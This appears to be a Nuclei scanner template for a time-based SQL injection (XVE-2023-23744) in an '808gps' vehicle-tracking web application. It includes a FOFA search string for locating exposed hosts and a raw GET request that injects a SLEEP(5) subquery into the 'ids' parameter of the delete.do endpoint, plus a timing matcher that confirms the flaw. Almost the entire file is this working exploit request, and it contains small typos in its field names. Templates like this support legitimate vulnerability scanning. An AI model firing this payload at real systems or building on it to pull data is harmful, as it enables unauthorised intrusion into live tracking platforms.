id: XVE-2023-23744

info:
  name: XVE-2023-23744
  author: lengmo
  severity: high
  description: XVE-2023-23744
  tags: sqli
  metadata:
    fofa-qeury: body="/808gps/"
    veified: true
    max-request: 1

http:
  - raw:
      - |
        GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        ccept-Encoding: gzip, deflate
        Connection: close


               
    matchers:     
      - type: dsl
        dsl:
          - "status_code_1 == 200 && duration>=5 && duration<=8 && contains(header,'*')" 